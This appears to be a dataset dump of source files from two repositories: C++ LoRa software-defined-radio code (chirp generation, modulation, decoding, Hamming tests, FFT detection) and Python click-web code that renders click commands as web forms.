error = false;\n\t\tbool bad = false;\n\t\tstd::vector<uint8_t> bytes((codewords.size()+1) / 2);\n\t\tsize_t dOfs = 0;\n\t\tsize_t cOfs = 0;\n \n size_t packetLength = 0;\n size_t dataLength = 0;\n bool checkCrc = _crcc;\n\t\t\n\t\tif (_explicit) {\n\t\t\tbytes[0] = decodeHamming84sx(codewords[1], error, bad) & 0xf;\n\t\t\tbytes[0] |= decodeHamming84sx(codewords[0], error, bad) << 4;\t// length\n\n\t\t\tbytes[1] = decodeHamming84sx(codewords[2], error, bad) & 0xf;\t// coding rate and crc enable\n\n\t\t\tbytes[2] = decodeHamming84sx(codewords[4], error, bad) & 0xf;\n\t\t\tbytes[2] |= decodeHamming84sx(codewords[3], error, bad) << 4;\t// checksum\n\t\t\t\n\t\t\tbytes[2] ^= 
headerChecksum(bytes.data());\n\n\t\t\tif (error && _errorCheck) return this->drop();\n \n if (0 == (bytes[1] & 1)) checkCrc = false;\t// disable crc check if not present in the packet\n rdd = (bytes[1] >> 1) & 0x7;\t\t\t\t// header contains error correction info\n if (rdd > 4) return this->drop();\n \n packetLength = bytes[0];\n dataLength = packetLength + ((bytes[1] & 1)?5:3); // include header and crc\n \n\t\t\tcOfs = N_HEADER_CODEWORDS;\n\t\t\tdOfs = 6;\n }else{\n packetLength = _dataLength;\n if (_crcc){\n dataLength = packetLength + 2;\n }else{\n dataLength = packetLength;\n }\n }\n \n if (dataLength > bytes.size()) return this->drop();\n\t\t\n\t\tfor (; cOfs < PPM; cOfs++, dOfs++) {\n\t\t\tif (dOfs & 1)\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming84sx(codewords[cOfs], error, bad) << 4;\n\t\t\telse\n\t\t\t\tbytes[dOfs >> 1] = decodeHamming84sx(codewords[cOfs], error, bad) & 0xf;\n\t\t}\n\n\t\tif (dOfs & 1) {\n\t\t\tif (rdd == 0){\n\t\t\t\tbytes[dOfs>>1] |= codewords[cOfs++] << 4;\n\t\t\t}\n\t\t\telse if (rdd == 1){\n\t\t\t\tbytes[dOfs >> 1] |= checkParity54(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 2) {\n\t\t\t\tbytes[dOfs >> 1] |= checkParity64(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 3){\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming74sx(codewords[cOfs++], error) << 4;\n\t\t\t}\n\t\t\telse if (rdd == 4){\n\t\t\t\tbytes[dOfs >> 1] |= decodeHamming84sx(codewords[cOfs++], error, bad) << 4;\n\t\t\t}\n\t\t\tdOfs++;\n\t\t}\n\t\tdOfs >>= 1;\n\n\t\tif (error && _errorCheck) return this->drop();\n\n\n\t\t//decode each codeword as 2 bytes with correction\n\t\tif (rdd == 0) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = codewords[cOfs++] & 0xf;\n\t\t\tbytes[i] |= codewords[cOfs++] << 4;\n\t\t}else if (rdd == 1) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = checkParity54(codewords[cOfs++],error);\n\t\t\tbytes[i] |= checkParity54(codewords[cOfs++], error) << 4;\n\t\t}else if (rdd == 2) for (size_t i = dOfs; i < dataLength; i++) {\n\t\t\tbytes[i] = checkParity64(codewords[cOfs++], error);\n\t\t\tbytes[i] |= checkParity64(codewords[cOfs++],error) << 4;\n\t\t}else if (rdd == 3) for (size_t i = dOfs; i < dataLength; i++){\n\t\t\tbytes[i] = decodeHamming74sx(codewords[cOfs++], error) & 0xf;\n\t\t\tbytes[i] |= decodeHamming74sx(codewords[cOfs++], error) << 4;\n\t\t}else if (rdd == 4) for (size_t i = dOfs; i < dataLength; i++){\n\t\t\tbytes[i] = decodeHamming84sx(codewords[cOfs++], error, bad) & 0xf;\n\t\t\tbytes[i] |= decodeHamming84sx(codewords[cOfs++], error, bad) << 4;\n\t\t}\n\t\t\n\t\tif (error && _errorCheck) return this->drop();\n \n dOfs = 0;\n \n\t\tif (_explicit) {\n\t\t\tif (bytes[1] & 1) {\t\t\t\t\t\t\t// always compute crc if present\n\t\t\t\tuint16_t crc = sx1272DataChecksum(bytes.data() + 3, packetLength);\n\t\t\t\tuint16_t packetCrc = bytes[3 + packetLength] | (bytes[4 + packetLength] << 8);\n\t\t\t\tif (crc != packetCrc && checkCrc) return this->drop();\n\t\t\t\tbytes[3 + packetLength] ^= crc;\n\t\t\t\tbytes[4 + packetLength] ^= (crc >> 8);\n\t\t\t}\n if (!_hdr){\n dOfs = 3;\n dataLength -= 5;\n }\n\t\t}\n\t\telse {\n if (checkCrc) {\n uint16_t crc = sx1272DataChecksum(bytes.data(), _dataLength);\n uint16_t packetCrc = bytes[_dataLength] | (bytes[_dataLength + 1] << 8);\n if (crc != packetCrc) return this->drop();\n bytes[_dataLength + 0] ^= crc;\n bytes[_dataLength + 1] ^= (crc >> 8);\n }\n\t\t}\n\t\t\n\t\t//post the output bytes\n\t\tPothos::Packet out;\n\t\tout.payload = Pothos::BufferChunk(typeid(uint8_t), 
dataLength);\n\t\tstd::memcpy(out.payload.as<void *>(), bytes.data()+dOfs, out.payload.length);\n\t\toutPort->postMessage(out);\n\t\treturn;\n\n }\n\nprivate:\n\n void drop(void)\n {\n _dropped++;\n this->emitSignal(\"dropped\", _dropped);\n }\n\n size_t _sf;\n size_t _ppm;\n size_t _rdd;\n bool _whitening;\n\tbool _crcc;\n\tbool _interleaving;\n\tbool _errorCheck;\n\tbool _explicit;\n bool _hdr;\n\tsize_t _dataLength;\n unsigned long long _dropped;\n};\n\nstatic Pothos::BlockRegistry registerLoRaDecoder(\n \"/lora/lora_decoder\", &LoRaDecoder::make);\n"
},
{
"alpha_fraction": 0.5664089918136597,
"alphanum_fraction": 0.5790583491325378,
"avg_line_length": 29.276596069335938,
"blob_id": "395ce3006617a05649a3011709c33a131a5729a2",
"content_id": "9df2fdefd9109962226dd224af0685acb69e78d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1423,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 47,
"path": "/ChirpGenerator.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#pragma once\n#include <Pothos/Config.hpp>\n#include <complex>\n#include <cmath>\n\n/*!\n * Generate a chirp\n * \\param [out] samps pointer to the output samples\n * \\param N samples per chirp sans the oversampling\n * \\param ovs the oversampling size\n * \\param NN the number of samples to generate\n * \\param f0 the phase offset/transmit symbol\n * \\param down true for downchirp, false for up\n * \\param ampl the chrip amplitude\n * \\param [inout] phaseAccum running phase accumulator value\n * \\return the number of samples generated\n */\ntemplate <typename Type>\nint genChirp(std::complex<Type> *samps, int N, int ovs, int NN, Type f0, bool down, const Type ampl, Type &phaseAccum)\n{\n const Type fMin = -M_PI / ovs;\n const Type fMax = M_PI / ovs;\n const Type fStep = (2 * M_PI) / (N * ovs * ovs);\n float f = fMin + f0;\n int i;\n if (down) {\n for (i = 0; i < NN; i++) {\n f += fStep;\n if (f > fMax) f -= (fMax - fMin);\n phaseAccum -= f;\n samps[i] = std::polar(ampl, phaseAccum);\n }\n }\n else {\n for (i = 0; i < NN; i++) {\n f += fStep;\n if (f > fMax) f -= (fMax - fMin);\n phaseAccum += f;\n samps[i] = std::polar(ampl, phaseAccum);\n }\n }\n phaseAccum -= floor(phaseAccum / (2 * M_PI)) * 2 * M_PI;\n return i;\n}\n"
},
{
"alpha_fraction": 0.5156172513961792,
"alphanum_fraction": 0.5518096089363098,
"avg_line_length": 27.408451080322266,
"blob_id": "f1a93aa2117975ffd6951762242a31b840fe3368",
"content_id": "c9c2f043c76a1f074ebb96476ff7333cfbd1ced6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2017,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 71,
"path": "/TestHamming.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include <iostream>\n#include \"LoRaCodes.hpp\"\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming84)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 84 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming84sx(byte);\n\n //check no bit errors\n error = false;\n decoded = decodeHamming84sx(encoded, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n error = false;\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming84sx(encoded1err, error);\n POTHOS_TEST_TRUE(not error);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit1 = 0; bit1 < 8; bit1++)\n {\n if (bit1 == bit0) continue;\n\n //check 2 bit errors (cant correct, but can detect\n error = false;\n unsigned char encoded2err = encoded1err ^ (1 << bit1);\n decoded = decodeHamming84sx(encoded2err, error);\n POTHOS_TEST_TRUE(error);\n }\n }\n }\n}\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_hamming74)\n{\n bool error;\n unsigned char decoded;\n\n //test hamming 74 with bit errors\n for (size_t i = 0; i < 16; i++)\n {\n unsigned char byte = i & 0xff;\n unsigned char encoded = encodeHamming74sx(byte);\n\n //check no bit errors\n decoded = decodeHamming74sx(encoded);\n POTHOS_TEST_EQUAL(byte, decoded);\n\n for (int bit0 = 0; bit0 < 8; bit0++)\n {\n //check 1 bit error\n unsigned char encoded1err = encoded ^ (1 << bit0);\n decoded = decodeHamming74sx(encoded1err);\n POTHOS_TEST_EQUAL(byte, decoded);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.4460259675979614,
"alphanum_fraction": 0.45798224210739136,
"avg_line_length": 30.252668380737305,
"blob_id": "270173493b63ff009559d0a67bca4808c82e7068",
"content_id": "126b00718229245dda91f18d0faf82bb5dc5023b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 8782,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 281,
"path": "/LoRaMod.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include \"ChirpGenerator.hpp\"\n#include <iostream>\n#include <complex>\n#include <cmath>\n\n/***********************************************************************\n * |PothosDoc LoRa Mod\n *\n * Modulate LoRa packets from symbols into a complex sample stream.\n *\n * <h2>Input format</h2>>\n *\n * The input port 0 accepts a packet containing pre-modulated symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Output format</h2>\n *\n * The output port 0 produces a complex sample stream of modulated chirps\n * to be transmitted at the specified bandwidth and carrier frequency.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor controls the symbol spread.\n * Each symbol will occupy 2^SF number of samples given the waveform BW.\n * |default 10\n *\n * |param sync[Sync word] The sync word is a 2-nibble, 2-symbol sync value.\n * The sync word is encoded after the up-chirps and before the down-chirps.\n * |default 0x12\n *\n * |param padding[Padding] Pad out the end of a packet with zeros.\n * This is mostly useful for simulation purposes, though some padding\n * may be desirable to flush samples through the radio transmitter.\n * |units symbols\n * |default 1\n *\n * |param ampl[Amplitude] The digital transmit amplitude.\n * |default 0.3\n *\n * |param ovs[Oversampling ratio] The oversampling ratio.\n * |default 1\n *\n * |factory /lora/lora_mod(sf)\n * |initializer setOvs(ovs)\n * |setter setSync(sync)\n * |setter setPadding(padding)\n * |setter setAmplitude(ampl)\n **********************************************************************/\nclass LoRaMod : public Pothos::Block\n{\npublic:\n\tLoRaMod(const size_t sf) :\n\t\tN(1 << sf),\n\t\t_ovs(1),\n\t\t_sync(0x12),\n\t\t_padding(1),\n\t\t_ampl(0.3f)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setSync));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setPadding));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setAmplitude));\n\t\tthis->registerCall(this, POTHOS_FCN_TUPLE(LoRaMod, setOvs));\n this->setupInput(0);\n this->setupOutput(0, typeid(std::complex<float>));\n\t\t_phaseAccum = 0;\n }\n\n static Block *make(const size_t sf)\n {\n return new LoRaMod(sf);\n }\n\n void setSync(const unsigned char sync)\n {\n _sync = sync;\n }\n\n void setPadding(const size_t padding)\n {\n _padding = padding;\n }\n\n void setAmplitude(const float ampl)\n {\n _ampl = ampl;\n }\n\n\tvoid setOvs(const size_t ovs)\n\t{\n\t\tif (ovs < 1 || ovs > 256) {\n\t\t\tthrow Pothos::InvalidArgumentException(\"LoRaDecoder::setOvs(\" + std::to_string(ovs) + \")\", \"invalid oversampling ratio\");\n\t\t}\n\t\telse {\n\t\t\t_ovs = ovs;\n\t\t}\n\t}\n\n void activate(void)\n {\n _state = STATE_WAITINPUT;\n }\n\n void work(void)\n {\n auto outPort = this->output(0);\n //float freq = 0.0;\n const size_t NN = N * _ovs;\n auto samps = outPort->buffer().as<std::complex<float> *>();\n size_t i = 0;\n\n //std::cout << \"mod state \" << int(_state) << std::endl;\n switch (_state)\n {\n ////////////////////////////////////////////////////////////////\n case STATE_WAITINPUT:\n ////////////////////////////////////////////////////////////////\n {\n\t\t\tif (not this->input(0)->hasMessage()) {\n\t\t\t\t//for (i = 0; i < N; i++){\n\t\t\t\t\t//samps[i] = 
0;\n\t\t\t\t//}\n\t\t\t\t//outPort->produce(i);\n\t\t\t\treturn;\n\t\t\t}\n auto msg = this->input(0)->popMessage();\n auto pkt = msg.extract<Pothos::Packet>();\n _payload = pkt.payload;\n _state = STATE_FRAMESYNC;\n _counter = 10;\n _phaseAccum = 0;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_FRAMESYNC:\n ////////////////////////////////////////////////////////////////\n {\n _counter--;\n i = genChirp(samps, N, _ovs, NN, 0.0f, false, _ampl, _phaseAccum);\n if (_counter == 0) _state = STATE_SYNCWORD0;\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_SYNCWORD0:\n ////////////////////////////////////////////////////////////////\n {\n const int sw0 = (_sync >> 4)*8;\n const float freq = (2*M_PI*sw0)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n _state = STATE_SYNCWORD1;\n _id = \"SYNC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_SYNCWORD1:\n ////////////////////////////////////////////////////////////////\n {\n const int sw1 = (_sync & 0xf)*8;\n const float freq = (2*M_PI*sw1)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n _state = STATE_DOWNCHIRP0;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP0:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_DOWNCHIRP1;\n _id = \"DC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP1:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_QUARTERCHIRP;\n _id = \"\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_QUARTERCHIRP:\n ////////////////////////////////////////////////////////////////\n {\n i = genChirp(samps, N, _ovs, NN / 4, 0.0f, true, _ampl, _phaseAccum);\n _state = STATE_DATASYMBOLS;\n _counter = 0;\n _id = \"QC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DATASYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n const int sym = _payload.as<const uint16_t *>()[_counter++];\n const float freq = (2*M_PI*sym)/NN;\n i = genChirp(samps, N, _ovs, NN, freq, false, _ampl, _phaseAccum);\n \n if (_counter >= _payload.elements())\n {\n //for (size_t j = 0; j < _counter; j++)\n // std::cout << \"mod[\" << j << \"]=\" << _payload.as<const uint16_t *>()[j] << std::endl;\n _state = STATE_PADSYMBOLS;\n _counter = 0;\n }\n _id = \"S\" + std::to_string(_counter);\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_PADSYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n _counter++;\n for (i = 0; i < NN; i++) samps[i] = 0.0f;\n if (_counter >= _padding)\n {\n _state = STATE_WAITINPUT;\n outPort->postLabel(Pothos::Label(\"txEnd\", Pothos::Object(), N-1));\n }\n _id = \"\";\n } break;\n\n }\n\n if (not _id.empty())\n {\n outPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n }\n outPort->produce(i);\n }\n\n //! 
Custom output buffer manager with slabs large enough for output chirp\n Pothos::BufferManager::Sptr getOutputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"0\")\n {\n this->output(name)->setReserve(N * _ovs);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N * _ovs *sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getOutputBufferManager(name, domain);\n }\n\nprivate:\n //configuration\n const size_t N;\n\tsize_t _ovs;\n unsigned char _sync;\n size_t _padding;\n float _ampl;\n\tfloat _phaseAccum;\n //state\n enum LoraDemodState\n {\n STATE_WAITINPUT,\n STATE_FRAMESYNC,\n STATE_SYNCWORD0,\n STATE_SYNCWORD1,\n STATE_DOWNCHIRP0,\n STATE_DOWNCHIRP1,\n STATE_QUARTERCHIRP,\n STATE_DATASYMBOLS,\n STATE_PADSYMBOLS,\n };\n LoraDemodState _state;\n size_t _counter;\n Pothos::BufferChunk _payload;\n std::string _id;\n};\n\nstatic Pothos::BlockRegistry registerLoRaMod(\n \"/lora/lora_mod\", &LoRaMod::make);\n"
},
{
"alpha_fraction": 0.5216080546379089,
"alphanum_fraction": 0.5442211031913757,
"avg_line_length": 26.63888931274414,
"blob_id": "a0f5c25b7d8275db77ba056468e31da379bad983",
"content_id": "09c93cad99b0f5ec0fbb8c45dc07b90f62d08cfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1990,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 72,
"path": "/LoRaDetector.hpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include \"kissfft.hh\"\n#include <complex>\n#include <vector>\n\ntemplate <typename Type>\nclass LoRaDetector\n{\npublic:\n LoRaDetector(const size_t N):\n N(N),\n _fftInput(N),\n _fftOutput(N),\n _fft(N, false)\n {\n _powerScale = 20*std::log10(N);\n return;\n }\n\n //! feed simply sets an input sample\n void feed(const size_t i, const std::complex<Type> &samp)\n {\n _fftInput[i] = samp;\n }\n\n //! calculates argmax(abs(fft(input)))\n size_t detect(Type &power, Type &powerAvg, Type &fIndex, std::complex<Type> *fftOutput = nullptr)\n {\n if (fftOutput == nullptr) fftOutput = _fftOutput.data();\n _fft.transform(_fftInput.data(), fftOutput);\n size_t maxIndex = 0;\n Type maxValue = 0;\n double total = 0;\n for (size_t i = 0; i < N; i++)\n {\n auto bin = fftOutput[i];\n auto re = bin.real();\n auto im = bin.imag();\n auto mag2 = re*re + im*im;\n total += mag2;\n if (mag2 > maxValue)\n {\n maxIndex = i;\n maxValue = mag2;\n }\n }\n\n const auto noise = std::sqrt(Type(total - maxValue));\n const auto fundamental = std::sqrt(maxValue);\n\n powerAvg = 20*std::log10(noise) - _powerScale;\n power = 20*std::log10(fundamental) - _powerScale;\n\n auto left = std::abs(fftOutput[maxIndex > 0?maxIndex-1:N-1]);\n auto right = std::abs(fftOutput[maxIndex < N-1?maxIndex+1:0]);\n\n const auto demon = (2.0 * fundamental) - right - left;\n if (demon == 0.0) fIndex = 0.0; //check for divide by 0\n else fIndex = 0.5 * (right - left) / demon;\n\n return maxIndex;\n }\n\nprivate:\n const size_t N;\n Type _powerScale;\n std::vector<std::complex<Type>> _fftInput;\n std::vector<std::complex<Type>> _fftOutput;\n kissfft<Type> _fft;\n};\n"
}
] | 17 |
JayBigGuy10/click-web | https://github.com/JayBigGuy10/click-web | dcdc61cf55c9a464dedd63df09753a372310a1ad | ca88e118a283c92bff214e6fa0502db629d7dd1e | 707533118e94886ed3a8b5afdfb3c9256c91b091 | refs/heads/master | 2020-04-20T17:14:00.023547 | 2019-02-03T10:26:17 | 2019-02-03T10:26:17 | 168,982,849 | 0 | 0 | MIT | 2019-02-03T19:13:43 | 2019-02-03T10:26:25 | 2019-02-03T10:26:24 | null | [
{
"alpha_fraction": 0.6366001963615417,
"alphanum_fraction": 0.6374675035476685,
"avg_line_length": 31.02777862548828,
"blob_id": "360467fce913f71869df8d95e8d07770a006d78b",
"content_id": "4a04a1509951128cdc472e91f4c9818d7628bd53",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1153,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 36,
"path": "/click_web/resources/index.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n\nimport click\n\nimport click_web\n\nfrom flask import render_template\n\n\ndef index():\n with click.Context(click_web.click_root_cmd, info_name=click_web.click_root_cmd.name, parent=None) as ctx:\n return render_template('show_tree.html.j2', ctx=ctx, tree=_click_to_tree(ctx, click_web.click_root_cmd))\n\n\ndef _click_to_tree(ctx: click.Context, node: click.BaseCommand, ancestors=[]):\n '''\n Convert a click root command to a tree of dicts and lists\n :return: a json like tree\n '''\n res_childs = []\n res = OrderedDict()\n res['is_group'] = isinstance(node, click.core.MultiCommand)\n if res['is_group']:\n # a group, recurse for every child\n for key in node.list_commands(ctx):\n child = node.get_command(ctx, key)\n res_childs.append(_click_to_tree(ctx, child, ancestors[:] + [node, ]))\n\n res['name'] = node.name\n res['short_help'] = node.get_short_help_str()\n res['help'] = node.help\n path_parts = ancestors + [node]\n res['path'] = '/' + '/'.join(p.name for p in path_parts)\n if res_childs:\n res['childs'] = res_childs\n return res\n"
},
{
"alpha_fraction": 0.5658201575279236,
"alphanum_fraction": 0.566094696521759,
"avg_line_length": 28.856557846069336,
"blob_id": "78f0770716820c98f641161deabd128d6ac660f9",
"content_id": "82ac5f9c08f9de7e3e86a4daf79456032c97da52",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7285,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 244,
"path": "/click_web/resources/input_fields.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "import click\n\nfrom click_web import exceptions\nfrom click_web.web_click_types import EmailParamType\n\nseparator = '.'\n\n\nclass NotSupported(ValueError):\n pass\n\n\nclass BaseInput:\n param_type_cls = None\n\n def __init__(self, ctx, param: click.Parameter, command_index, param_index):\n self.ctx = ctx\n self.param = param\n self.command_index = command_index\n self.param_index = param_index\n if not self.is_supported():\n raise NotSupported()\n\n def is_supported(self):\n return isinstance(self.param.type, self.param_type_cls)\n\n @property\n def fields(self) -> dict:\n field = {}\n param = self.param\n\n field['param'] = param.param_type_name\n if param.param_type_name == 'option':\n name = '--{}'.format(self._to_cmd_line_name(param.name))\n field['value'] = param.default if param.default else ''\n field['checked'] = 'checked=\"checked\"' if param.default else ''\n field['desc'] = param.help\n field['help'] = param.get_help_record(self.ctx)\n elif param.param_type_name == 'argument':\n name = self._to_cmd_line_name(param.name)\n field['value'] = param.default\n field['checked'] = ''\n field['help'] = ''\n\n field['name'] = self._build_name(name)\n field['required'] = param.required\n\n if param.nargs < 0:\n raise exceptions.ClickWebException(\"Parameters with unlimited nargs not supportet at the moment.\")\n field['nargs'] = param.nargs\n field['human_readable_name'] = param.human_readable_name.replace('_', ' ')\n field.update(self.type_attrs)\n return field\n\n @property\n def type_attrs(self) -> dict:\n \"\"\"\n Here the input type and type specific information should be retuned as a dict\n :return:\n \"\"\"\n raise NotImplementedError()\n\n def _to_cmd_line_name(self, name: str) -> str:\n return name.replace('_', '-')\n\n def _build_name(self, name: str):\n \"\"\"\n Construct a name to use for field in form that have information about\n what sub-command it belongs order index (for later sorting) and type of parameter.\n \"\"\"\n # get the type of param to encode the in the name\n if self.param.param_type_name == 'option':\n param_type = 'flag' if self.param.is_bool_flag else 'option'\n else:\n param_type = self.param.param_type_name\n\n click_type = self.type_attrs['click_type']\n form_type = self.type_attrs['type']\n\n # in order for form to be have arguments for sub commands we need to add the\n # index of the command the argument belongs to\n return separator.join(str(p) for p in (self.command_index,\n self.param_index,\n param_type,\n click_type,\n form_type,\n name))\n\n\nclass ChoiceInput(BaseInput):\n param_type_cls = click.Choice\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'option'\n type_attrs['options'] = self.param.type.choices\n type_attrs['click_type'] = 'choice'\n return type_attrs\n\n\nclass FlagInput(BaseInput):\n def is_supported(self, ):\n return self.param.param_type_name == 'option' and self.param.is_bool_flag\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'checkbox'\n type_attrs['click_type'] = 'bool_flag'\n return type_attrs\n\n\nclass IntInput(BaseInput):\n param_type_cls = click.types.IntParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'number'\n type_attrs['step'] = '1'\n type_attrs['click_type'] = 'int'\n return type_attrs\n\n\nclass FloatInput(BaseInput):\n param_type_cls = click.types.FloatParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'number'\n type_attrs['step'] = 'any'\n 
type_attrs['click_type'] = 'float'\n return type_attrs\n\n\nclass FolderInput(BaseInput):\n\n def is_supported(self):\n if isinstance(self.param.type, click.Path):\n if self.param.type.dir_okay:\n return True\n return False\n\n @property\n def type_attrs(self):\n type_attrs = {}\n # if it is required we treat it as an input folder\n # and only accept zip.\n mode = 'r' if self.param.type.exists else 'w'\n type_attrs['click_type'] = f'path[{mode}]'\n if self.param.type.exists:\n type_attrs['accept'] = \"application/zip\"\n type_attrs['type'] = 'file'\n else:\n type_attrs['type'] = 'hidden'\n return type_attrs\n\n\nclass FileInput(BaseInput):\n\n def is_supported(self):\n if isinstance(self.param.type, click.File):\n return True\n elif isinstance(self.param.type, click.Path):\n if (self.param.type.file_okay):\n return True\n return False\n\n @property\n def type_attrs(self):\n type_attrs = {}\n if isinstance(self.param.type, click.File):\n mode = self.param.type.mode\n else:\n # TODO: figure out\n mode = 'r'\n\n type_attrs['click_type'] = f'file[{mode}]'\n\n if 'r' not in mode:\n if self.param.required:\n # if file is only for output do not show in form\n type_attrs['type'] = 'hidden'\n else:\n type_attrs['type'] = 'text'\n\n else:\n type_attrs['type'] = 'file'\n return type_attrs\n\n\nclass EmailInput(BaseInput):\n param_type_cls = EmailParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'email'\n type_attrs['click_type'] = 'email'\n return type_attrs\n\n\nclass DefaultInput(BaseInput):\n param_type_cls = click.ParamType\n\n @property\n def type_attrs(self):\n type_attrs = {}\n type_attrs['type'] = 'text'\n type_attrs['click_type'] = 'text'\n return type_attrs\n\n\n'''\nThe types of inputs we support form inputs listed in priority order (first that matches will be selected).\nTo add new Input handling for html forms for custom Parameter types just Subclass BaseInput and insert\nthe class in the list.\n'''\nINPUT_TYPES = [ChoiceInput,\n FlagInput,\n IntInput,\n FloatInput,\n FolderInput,\n FileInput,\n EmailInput]\n\n_DEFAULT_INPUT = [DefaultInput]\n\n\ndef get_input_field(ctx: click.Context, param: click.Parameter, command_index, param_index) -> dict:\n \"\"\"\n Convert a click.Parameter into a dict structure describing a html form option\n \"\"\"\n for input_cls in INPUT_TYPES + _DEFAULT_INPUT:\n try:\n input_type = input_cls(ctx, param, command_index, param_index)\n except NotSupported:\n pass\n else:\n fields = input_type.fields\n return fields\n raise NotSupported(f\"No Form input type not supported: {param}\")\n"
},
{
"alpha_fraction": 0.8028169274330139,
"alphanum_fraction": 0.8098591566085815,
"avg_line_length": 46.33333206176758,
"blob_id": "2d137106c8010cad9d64b7f54c6863c643fb1fb1",
"content_id": "432408ff29024f9d3affc873dc629d001060f482",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 142,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 3,
"path": "/tests/conftest.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
"text": "# flake8: noqa\nfrom tests.fixtures.click_fixtures import loaded_script_module, cli, ctx\nfrom tests.fixtures.flask_fixtures import app, client\n"
},
{
"alpha_fraction": 0.6320056319236755,
"alphanum_fraction": 0.6337680816650391,
"avg_line_length": 40.72058868408203,
"blob_id": "ab70ae9aeff25d874a575cbd1de69b73901a6338",
"content_id": "08e3d9fbd98d278857a35d2d3e07326bd663bc61",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2837,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 68,
"path": "/click_web/resources/cmd_form.py",
"repo_name": "JayBigGuy10/click-web",
"src_encoding": "UTF-8",
